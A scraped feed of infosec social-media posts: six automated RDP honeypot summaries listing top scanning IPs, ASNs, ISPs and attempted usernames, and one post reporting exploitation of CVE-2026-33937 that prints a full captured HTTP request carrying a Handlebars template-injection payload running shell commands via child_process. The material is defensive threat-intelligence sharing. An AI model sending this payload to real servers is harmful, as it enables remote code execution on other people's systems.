  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-21 RDP #Honeypot IOCs - 468 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs:
    46.63.101.233 - 276
    193.169.194.14 - 57
    111.170.152.113 - 15
    Top ASNs:
    AS51784 - 276
    AS214576 - 57
    AS396982 - 45
    Top Accounts:
    hello - 309
    (empty) - 57
    Test - 30
    Top ISPs:
    X-city Customers and Private - 276
    Berdiev Ruslan Mukhabatovich - 57
    Google LLC - 45
    Top Clients:
    Unknown - 468
    Top Software:
    Unknown - 468
    Top Keyboards:
    Unknown - 468
    Top IP Classification:
    Unknown - 408
    hosting - 48
    hosting & proxy - 12
    Pastebin links with full 24-hr RDP Honeypot IOC Lists:
    Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-21 RDP #Honeypot IOCs - 312 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs:
    46.63.101.233 - 184
    193.169.194.14 - 38
    111.170.152.113 - 10
    Top ASNs:
    AS51784 - 184
    AS214576 - 38
    AS396982 - 30
    Top Accounts:
    hello - 206
    (empty) - 38
    Test - 20
    Top ISPs:
    X-city Customers and Private - 184
    Berdiev Ruslan Mukhabatovich - 38
    Google LLC - 30
    Top Clients:
    Unknown - 312
    Top Software:
    Unknown - 312
    Top Keyboards:
    Unknown - 312
    Top IP Classification:
    Unknown - 272
    hosting - 32
    hosting & proxy - 8
    Pastebin links with full 24-hr RDP Honeypot IOC Lists:
    Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-21 RDP #Honeypot IOCs - 156 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs:
    46.63.101.233 - 92
    193.169.194.14 - 19
    111.170.152.113 - 5
    Top ASNs:
    AS51784 - 92
    AS214576 - 19
    AS396982 - 15
    Top Accounts:
    hello - 103
    (empty) - 19
    Test - 10
    Top ISPs:
    X-city Customers and Private - 92
    Berdiev Ruslan Mukhabatovich - 19
    Google LLC - 15
    Top Clients:
    Unknown - 156
    Top Software:
    Unknown - 156
    Top Keyboards:
    Unknown - 156
    Top IP Classification:
    Unknown - 136
    hosting - 16
    hosting & proxy - 4
    Pastebin links with full 24-hr RDP Honeypot IOC Lists:
    Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-19 RDP #Honeypot IOCs - 420 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs:
    46.63.101.233 - 99
    193.169.194.14 - 63
    124.222.173.104 - 57
    Top ASNs:
    AS51784 - 99
    AS214576 - 63
    AS45090 - 57
    Top Accounts:
    hello - 204
    (empty) - 66
    Test - 36
    Top ISPs:
    X-city Customers and Private - 99
    Berdiev Ruslan Mukhabatovich - 63
    China Internet Network Information Center - 57
    Top Clients:
    Unknown - 420
    Top Software:
    Unknown - 420
    Top Keyboards:
    Unknown - 420
    Top IP Classification:
    Unknown - 303
    hosting - 90
    proxy - 24
    Pastebin links with full 24-hr RDP Honeypot IOC Lists:
    Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-08 RDP #Honeypot IOCs - 300 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs:
    46.63.101.233 - 45
    104.248.62.230 - 45
    160.187.146.221 - 30
    Top ASNs:
    AS14061 - 48
    AS51784 - 45
    AS63949 - 42
    Top Accounts:
    hello - 156
    Test - 39
    eltons - 15
    Top ISPs:
    DigitalOcean, LLC - 48
    X-city Customers and Private - 45
    Akamai Technologies, Inc. - 42
    Top Clients:
    Unknown - 300
    Top Software:
    Unknown - 300
    Top Keyboards:
    Unknown - 300
    Top IP Classification:
    Unknown - 153
    hosting - 135
    proxy - 12
    Pastebin links with full 24-hr RDP Honeypot IOC Lists:
    Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-08 RDP #Honeypot IOCs - 200 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs:
    46.63.101.233 - 30
    104.248.62.230 - 30
    160.187.146.221 - 20
    Top ASNs:
    AS14061 - 32
    AS51784 - 30
    AS63949 - 28
    Top Accounts:
    hello - 104
    Test - 26
    eltons - 10
    Top ISPs:
    DigitalOcean, LLC - 32
    X-city Customers and Private - 30
    Akamai Technologies, Inc. - 28
    Top Clients:
    Unknown - 200
    Top Software:
    Unknown - 200
    Top Keyboards:
    Unknown - 200
    Top IP Classification:
    Unknown - 102
    hosting - 90
    proxy - 8
    Pastebin links with full 24-hr RDP Honeypot IOC Lists:
    Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    heinen@infosec.exchange
    Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937
    Here is a full request:

    POST /api/email/preview HTTP/1.1
    Host: x.x.x.x:8080
    Connection: close
    Content-Length: 585
    Content-Type: application/json
    User-Agent: Go-http-client/1.1

    {"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}

    #dfir #honeypot #infosec #cybersecurity